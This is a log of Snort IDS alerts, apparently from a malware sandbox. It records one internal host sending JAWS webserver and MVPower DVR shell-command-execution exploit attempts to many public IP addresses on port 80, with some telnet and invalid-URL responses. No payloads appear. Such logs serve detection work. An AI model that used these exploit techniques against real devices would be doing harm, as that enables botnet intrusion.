Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49906 -> 71.78.222.122:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36530 -> 93.124.7.241:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52904 -> 164.125.102.23:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51864 -> 13.127.48.126:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60572 -> 18.206.144.76:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36530 -> 93.124.7.241:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33316 -> 198.137.227.117:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53886 -> 163.197.10.78:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49828 -> 206.237.203.53:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49906 -> 71.78.222.122:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51864 -> 13.127.48.126:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44640 -> 154.83.130.140:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60572 -> 18.206.144.76:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53886 -> 163.197.10.78:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44640 -> 154.83.130.140:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36854 -> 148.251.213.163:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40264 -> 104.127.186.153:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40264 -> 104.127.186.153:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.127.186.153:80 -> 192.168.2.23:40264
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36854 -> 148.251.213.163:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36030 -> 2.20.110.236:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36030 -> 2.20.110.236:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 2.20.110.236:80 -> 192.168.2.23:36030
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56048 -> 23.4.45.116:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59824 -> 129.65.64.21:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51124 -> 14.47.155.220:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47938 -> 121.182.131.131:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56048 -> 23.4.45.116:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.4.45.116:80 -> 192.168.2.23:56048
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42242 -> 192.126.191.244:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54228 -> 192.177.86.65:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42242 -> 192.126.191.244:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 192.126.191.244:80 -> 192.168.2.23:42242
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47938 -> 121.182.131.131:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54228 -> 192.177.86.65:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48690 -> 163.198.23.5:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48690 -> 163.198.23.5:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 163.198.23.5:80 -> 192.168.2.23:48690
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49630 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33560 -> 145.239.179.74:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49630 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.73.145.187:80 -> 192.168.2.23:49630
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54812 -> 104.110.245.235:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43764 -> 188.215.245.201:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54812 -> 104.110.245.235:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.110.245.235:80 -> 192.168.2.23:54812
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43764 -> 188.215.245.201:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39412 -> 84.33.4.193:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54362 -> 23.43.198.42:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39412 -> 84.33.4.193:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58252 -> 74.114.236.42:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54362 -> 23.43.198.42:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.43.198.42:80 -> 192.168.2.23:54362
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42816 -> 208.73.161.59:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40864 -> 45.42.140.15:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58252 -> 74.114.236.42:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53672 -> 92.123.168.89:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58270 -> 110.77.231.242:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55646 -> 40.121.67.55:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40864 -> 45.42.140.15:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42816 -> 208.73.161.59:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55646 -> 40.121.67.55:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53672 -> 92.123.168.89:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 92.123.168.89:80 -> 192.168.2.23:53672
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58270 -> 110.77.231.242:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40370 -> 116.223.158.191:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40370 -> 116.223.158.191:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 116.223.158.191:80 -> 192.168.2.23:40370
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56276 -> 82.145.53.210:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55498 -> 104.66.118.40:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56276 -> 82.145.53.210:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55498 -> 104.66.118.40:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.66.118.40:80 -> 192.168.2.23:55498
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58738 -> 103.23.150.77:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60958 -> 65.23.95.68:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52378 -> 154.7.26.220:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47850 -> 154.210.227.149:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60958 -> 65.23.95.68:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54836 -> 210.157.8.21:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52378 -> 154.7.26.220:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47850 -> 154.210.227.149:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54836 -> 210.157.8.21:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37586 -> 107.149.36.175:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50136 -> 13.35.34.72:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50138 -> 13.35.34.72:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37586 -> 107.149.36.175:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50136 -> 13.35.34.72:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50138 -> 13.35.34.72:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52148 -> 52.8.118.109:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55398 -> 87.241.131.132:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54648 -> 104.25.186.110:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56218 -> 163.191.144.148:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54648 -> 104.25.186.110:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52148 -> 52.8.118.109:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55398 -> 87.241.131.132:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32990 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32990 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.8.136.124:80 -> 192.168.2.23:32990
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34616 -> 104.18.204.189:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34616 -> 104.18.204.189:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37852 -> 79.122.29.49:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37852 -> 79.122.29.49:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52880 -> 23.1.50.162:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52880 -> 23.1.50.162:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.1.50.162:80 -> 192.168.2.23:52880
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50822 -> 140.238.17.187:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37726 -> 23.219.254.140:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37726 -> 23.219.254.140:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.219.254.140:80 -> 192.168.2.23:37726
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52334 -> 107.179.98.103:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50822 -> 140.238.17.187:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52334 -> 107.179.98.103:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33038 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33038 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.8.136.124:80 -> 192.168.2.23:33038
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51310 -> 132.145.83.236:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51310 -> 132.145.83.236:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59810 -> 23.233.60.112:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39012 -> 37.251.249.22:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49550 -> 138.94.157.171:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55788 -> 113.61.196.114:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59810 -> 23.233.60.112:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33142 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56674 -> 23.231.96.186:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55788 -> 113.61.196.114:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49550 -> 138.94.157.171:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53428 -> 122.10.14.220:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56674 -> 23.231.96.186:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33142 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.8.136.124:80 -> 192.168.2.23:33142
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53428 -> 122.10.14.220:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45504 -> 130.211.8.33:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45504 -> 130.211.8.33:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57496 -> 64.4.161.77:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57496 -> 64.4.161.77:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54624 -> 45.121.81.233:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45786 -> 18.194.219.160:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54066 -> 23.72.103.103:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45786 -> 18.194.219.160:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39152 -> 18.193.172.193:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60838 -> 94.130.38.180:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54066 -> 23.72.103.103:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.72.103.103:80 -> 192.168.2.23:54066
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39152 -> 18.193.172.193:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60838 -> 94.130.38.180:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47884 -> 212.162.153.57:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44738 -> 23.65.25.211:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46632 -> 103.53.72.59:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47884 -> 212.162.153.57:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44738 -> 23.65.25.211:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.65.25.211:80 -> 192.168.2.23:44738
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46632 -> 103.53.72.59:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.166.205.82:23 -> 192.168.2.23:47448
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33360 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33360 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.8.136.124:80 -> 192.168.2.23:33360
Source: Traffic	Snort IDS: 716 INFO TELNET access 195.162.70.50:23 -> 192.168.2.23:50284
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49150 -> 63.35.106.33:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55334 -> 159.69.185.199:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56866 -> 46.41.57.63:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49150 -> 63.35.106.33:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55334 -> 159.69.185.199:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56866 -> 46.41.57.63:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33030 -> 45.79.11.93:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35318 -> 107.174.250.137:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49626 -> 23.222.205.199:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57894 -> 23.211.83.100:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58204 -> 54.91.171.119:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33030 -> 45.79.11.93:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35318 -> 107.174.250.137:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49626 -> 23.222.205.199:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.222.205.199:80 -> 192.168.2.23:49626
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52570 -> 104.71.231.31:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57894 -> 23.211.83.100:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.211.83.100:80 -> 192.168.2.23:57894
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58204 -> 54.91.171.119:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54488 -> 147.47.78.53:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54360 -> 184.84.124.175:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52570 -> 104.71.231.31:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.71.231.31:80 -> 192.168.2.23:52570
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51624 -> 17.250.122.106:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52902 -> 59.124.138.19:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38762 -> 175.183.94.16:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54488 -> 147.47.78.53:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54360 -> 184.84.124.175:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.84.124.175:80 -> 192.168.2.23:54360
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52902 -> 59.124.138.19:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51624 -> 17.250.122.106:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38762 -> 175.183.94.16:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.166.205.82:23 -> 192.168.2.23:47506
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57218 -> 31.19.184.171:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60228 -> 103.195.102.61:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56110 -> 104.64.130.77:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47650 -> 163.198.43.32:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47052 -> 184.168.137.54:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58648 -> 87.229.82.196:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47650 -> 163.198.43.32:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 163.198.43.32:80 -> 192.168.2.23:47650
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58648 -> 87.229.82.196:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34342 -> 134.121.170.228:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47008 -> 43.255.108.94:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34152 -> 192.99.143.98:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60228 -> 103.195.102.61:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60098 -> 13.55.91.197:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56110 -> 104.64.130.77:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.64.130.77:80 -> 192.168.2.23:56110
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47052 -> 184.168.137.54:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34152 -> 192.99.143.98:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44014 -> 104.109.117.106:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47008 -> 43.255.108.94:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37630 -> 156.240.39.3:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60098 -> 13.55.91.197:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57218 -> 31.19.184.171:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44014 -> 104.109.117.106:80
